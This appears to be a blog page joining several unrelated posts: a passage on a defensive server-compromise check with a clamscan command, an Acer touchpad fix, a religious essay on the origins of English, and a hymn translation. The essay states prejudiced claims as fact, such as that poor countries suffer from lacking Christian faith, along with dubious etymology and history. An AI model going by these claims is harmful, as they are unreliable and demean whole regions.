Next I checked the content of hdparm and .depend.boot, and I don't see anything irregular there. They are both files from a legitimate Debian install; I've checked that they belong to deb packages and that they exist on other Debian Squeeze servers I administer as well as on my Debian desktop notebook. They are present everywhere: hdparm is part of the hdparm deb and .depend.boot is loaded by the /etc/init.d/rc script, containing some user string references:
After a close examination of the system, as well as research on the internet, I've figured out this is also a false positive. For the sake of not distributing script kiddie tools, which might put other system administrators in danger, I will not post a public download link to mysqljackpot. Anyway, if someone wants it for study purposes, just drop me a mail and I will send you a temporary download link.
Also, as webmin and usermin are not frequently used, I've decided to completely stop them and disable them from loading on boot.
I've also done a clamav scan (with lowered priority) over the whole file system with:
# nice -19 clamscan -r /*
in order to determine whether there is a PHPShell or some other kind of remote admin script kiddie script in perl / php etc. installed. Tomorrow I will continue investigating what is happening, and hopefully once I find out how the abuser entered the server I will update this post.
I have a task to fix one Acer Aspire 5100, also known as Acer Aspire 5100-5023. After re-installing Windows XP on the notebook, I downloaded the correct laptop touchpad drivers as provided by acer.com's website here (TouchPad Section). Inside the ZIP, I ran all 3 installers provided by Touchpad Driver Synaptics 220.127.116.11 .zip (e.g. Setup.exe, Elantech/setup.exe, Synaptics/Setup.exe).
After each installation completed I had to do the standard restart.
To my surprise, after Windows booted and I tested the TouchPad (scratching over it), the TouchPad moved the mouse pointer but after a second it stopped responding. This is the first time I have faced such a problem, so my guess was that something was wrong with the TouchPad driver and / or the driver was broken.
To make sure all was fine, I checked that the driver shows as correctly installed in:
Control Panel -> System -> Hardware ->Device Manager
The solution was as easy as just pressing the Fn + F7 key. I guess someone disabled the TouchPad device by mistake while testing the function keys on this laptop. The owner of the laptop had no idea about function keys, so he never thought this could cause the whole issue. It seems, stupidly enough, Acer made the laptop remember the function key choice even after a computer restart (pressing Fn+somenumber probably sets some settings in BIOS, so on next boot the settings are kept saved). BTW it might be worth saying that even re-installing a brand new Windows XP does not change a previously set function key setting. Actually it is rather strange why vendors make it possible to disable touchpads; I never heard of anybody willing to disable his TouchPad ….
Also, some people suggest Fn + F6 as a fix for this weird frozen TouchPad problem, but I believe these are just rumors. Well, that's it: if you have the same frozen, unresponsive TouchPad on an Acer or another notebook brand, just enable it by pressing the Fn + F7 keys, or whatever Fn + Fx it is on the notebook model. Hope this helps someone 🙂
Though funny and sometimes ridiculous, the second presentation is quite interesting for people interested in Anthropology: how the English country and language were established, and most of the people who somehow influenced the development of the English language as we know it.
Mongrel Nation – origin of english language
I knew the English language used to be a mixture of French, German and dead Latin, but never thought the origins of most words were so mixed up. Also the story of the King James Bible is very interesting; I never knew the King James Bible Version, so widely known as (KJV), has played so essential a role for English as we know it. As the video points out, the KJV played the most essential role in all English history for the development of the modern English language. As with mostly all else in modern developed civilization, it is strong Christian faith which played a key role in the formation and development of modern civilized society as we know it. It is a pity that nowadays most English people and Westerners have forgotten how important the Holy Bible (Bible btw means Book of Books Bi-Ble) and earlier Church teachings and writings were in order to have a good, safe life and well-fed people living in the Western countries. There was a good reason why this Holy Bible translation is still referred to as the King James Bible. King James (19 June 1566 – 27 March 1625) was a very wise man (linguist and scientist) along with being a King of Great Britain, France, Scotland and Ireland.
History of the King James Holy Bible version
Ancient English used to be called Anglo-Saxon English. The called Old English is part of the Germanic Languages group, so in theory nowadays should be much easier for a German, Dutch or some western person to speak English and understand its meaning than to people who belong to other main groups of languages like Slavonic Language group. Actually Slavonic Language group has also taken a multitude of words from German language, so situation with categorizing languages is not so clear to do. It was really interesting to me to learn Dutch Language is maybe in a way more close to primordial Original Anglo-Saxon English. This explains also how comes Dutch in general contains so much English in it and also so many English lingual structure 🙂
With all said, it is clear English as we know it just a mixture of words taken from languages around the world. Colonization that Great Britain did in past also played essential role for the inclusion of new words within English Language and Enriching the Language so much. It is also clear, how it come to be that the English is relatively easy to learn and flexible enough to become an International Language as it is today. There were also factors the Invasive character of Great Britain, the migration of many British and Germans to America continent the creation of the United States. And the raise of the US this all played important role in wide-spread of English. Most importantly the World Politics and the interests of certain people (Masonry and Royal Groups), development of modern science, Isaac Newton and the many scientists or (pseudo-scientists) that UK give birth to played an important role for making English popular.
While talking about the impact of Christian faith on English, it is not strange that Africa (the continent's countries) and the rest of the undeveloped or so-called third world countries are in such a bad condition, because many of them never had the chance of true spiritual enlightenment through faith in the Lord Jesus Christ. It is probably one of the reasons why western civilization was blessed to have an advancement in material goods, as a means for those people to help the poor and needy and spread the light of faith. Unfortunately now westerners can no longer spread the light of the faith, because the English Church is Anglican and is no longer in communion with the One Holy Apostolic Church – The Holy Orthodox Church. It is useful to say that the Anglican Church, in its development as a separate Church, took some of its beliefs from Roman Catholics and some from the Protestant Reformation. I even read somewhere that the Anglican Church had a point in its history where some negotiations were made with (Greek Eastern Orthodox Church?) for Anglicans to unite with the Eastern Orthodox Church. Sadly this never happened. But who knows, maybe in future Anglicans will change back to the original Christian faith, Orthodox Christianity.
Though the King James Bible version played an important role in the development of the Englishman and English as we know it, some of the verses inside are translated so they correspond better to a protestant understanding of the Holy Bible than an Orthodox or Roman Catholic one. Besides that, the bible contains fewer books (66 Books), whereas the Orthodox Christian bible contains (77 Books).
Though missing some important books, the Bible still included many new words, and by reaching the multitudes across Great Britain, Scotland, England and later the newly populated American lands it became the richest book of words for the XVI th century. Though some words in the KJV are too archaic for nowadays, its language is pretty close to modern English and is 95% or more understandable by mostly anyone who speaks some kind of English. Because of its historical importance in forming the English language, the King James Holy Bible version is great reading for anyone willing to learn some English. I myself have significantly improved my English by reading the KJV. Actually I believe that for anyone interested in history and anthropology it is very important to study Christianity well. Christianity and faith in Christ played so huge a role in the development of our civilization that it is impossible for us to understand History and Civilization properly without knowing the Christian faith well. I took some time to read interesting facts related to the King James Holy Bible, and I found an interesting page prepared by some Christian enthusiasts who did a statistical analysis over the King James Bible content 🙂
The whole topic of Origin of Words is mostly the most important thing that should be taught at schools and universities today, as it helps us better to understand why our culture and civilization is the way we are. As long as I studied in Holland in Arnhem Business School, it is quite saddening to say nowadays Universities and modern science has so much forgot about its relation and origins to faith in God, that even the little sort of anthropology I was told in Arnhem Business School – Human Resources and Quality Management (now known under the new official name IBS – International Business Studies) has absolutely nothing to do with real facts – the Christianity part (which is essential is totally missing).
With all said, modern people want to have a partial truth and completely scratch out the Christian origins of our modern civilization. The Crisis which emerged is just a reflection of the great spiritual crisis and lack of faith in God that is more and more apparent these days.
I've lately been more and more interested in Anthropology, and when I learn a bit more I will share it here; hopefully it might be interesting to someone else too 🙂
I don’t know if the above Gospodi Sil s Nami Budit song, which is in Church Slavonic – (Ancient Bulgarian Language), has a translation somewhere on the Internet, but as far as I checked I couldn’t find any, and hence I took some time trying to approximately translate the above included text I found on the Internet.
It is a bit hard for me and maybe I’m mistaken somewhere in the translation, as I don’t understand Church Slavonic very well, but I hope it will give a general idea of what the lyrics of this so beautiful song are approximately saying in modern English.
Text song the Gods Power will be with us, You we have as helper in our sorrows, Let God’s Power have mercy on us. Praise him and His Power, Praise Him because of his Great Mercies. – performed by Moscow’s Sretenski Monastery Church Choir
Gods Power will be with us … helper in our sorrows we have. God’s power will be with us Oh Power / (force) of God, have mercy on us!
Praise (Glorify) the Lord in his holiness, praise him testifying his power. God’s Power / (force) will be with us!
Glorify Him because of his power, Praise him because of his multitude of greatness-es. Gods Power will be with us!
Praise (Glorify) Him with voice of trumpets, Praise him with Psalms and (pipes ?). Gods Power will be with us!
Praise Him in (timpans and lices – not sure how this is translated – means other musical instruments?) – Praise him in strings and organs. Gods Power will be with us!
Praise Him with cymbals and (good hearted?) voices, praise him, praise Him with exclamations: every living soul (exhalation) to glorify the Lord. Gods Power will be with us:
Praise the Lord in all holiness, Praise Him in statement of his power. Gods Power will be with us:
Glory: Oh Lord, If we do not have (byhom?) Your holy prayer books, and the goodness of thy prayer books and the goodness of all saints who pray for us; what would we do oh Saviour, we who sing you.
You are glorified all time by Angels
You who glorify all the time Angels. Seer of all hearts, have mercy on our souls.
And again: Many are my prayers oh Holy Theotokos / (Virgin Mary), I have come to you the most pure, asking (requiring) rescue.
Come to my infirm (weak) soul, and pray Your Son and Our Lord, to grant me Forgiveness of sins, Because I’m poor and weak (in evil), You who are most Blessed among Mankind.
Oh you most Holy Theotokos, in my lifetime don’t leave me on a human mercy (hope) but you alone intercede on my behalf and Have Mercy on Me!
All my hope I give to you, Oh Mother of God, Rescue (Keep) me under your Shelter / (Shroud).
God’s Power Will be With Us is a triumph song of Victory of the Holy Orthodox Christian faith and the Orthodox Christians over all evil that is in the post sin fallen world. It is a Victorious Chant stating God’s power is with all us Orthodox Christians.
It is an expression of the power that our Holy Orthodox Christian faith contains. Gods power will be with us is well known to all Eastern Orthodox Slavonic Christians. It is sung in most if not all Slavonic Eastern Orthodox Churches around the world, i.e. Bulgaria, Russia, Serbia
It is common that this very beautiful Ancient Church Slavonic song is nowadays sung by Orthodox Christian choirs even in the Western World, which so sadly is nowadays predominated by Roman Catholic and Protestant (denominations beliefs). Here is God’s power will be with us – as sung in Church Slavonic in a Roman Catholic Chapel
Orthodox Christian Chant – Gospodi sil s nami (Russe Znamenny) / Gospodi sil s nami budit
Pojanje Koviljskih Monaha-Psalam 150 (Part of Gospodi sil s nami budit – Repentance Great Lent Canon sung in Serbian Monasteries)
This Church chant is sung in the Great Lent Church period in all Slavonic Churches around the world. The spiritual deepness and spiritual joy the song contains is amazingly great for us Eastern Orthodox Christians; it is nearly impossible to explain in words, but I hope by listening to it the listener re-unites with our Christ = (Messiah) = Saviour and his Holy Apostolic Church – The Orthodox Church!
This Orthodox Song is also present, probably, in the Greek, Syriac, Jerusalem, Ethiopian, Coptic, Chinese and the rest of the local Orthodox Churches throughout the whole universe. If someone from other Orthodox Churches reading this post can point me to their Church variant of this glorious Church hymn I will be most thankful!
Glory be to the Father, The Son and The Holy Spirit now and Forever and Ever. For Gods Power – Christ’s Holy Spirit will be with us ever unto the Ages of Ages according to the promise of our Lord Jesus in Holy Gospels.
☩ Walking in Light with Christ – Faith, Computing, Diary 2006-2020 Powered by: Pc Freak Solutions and Comments (RSS). Verbatim copying and distribution of this entire article is permitted in any medium, provided this notice is preserved.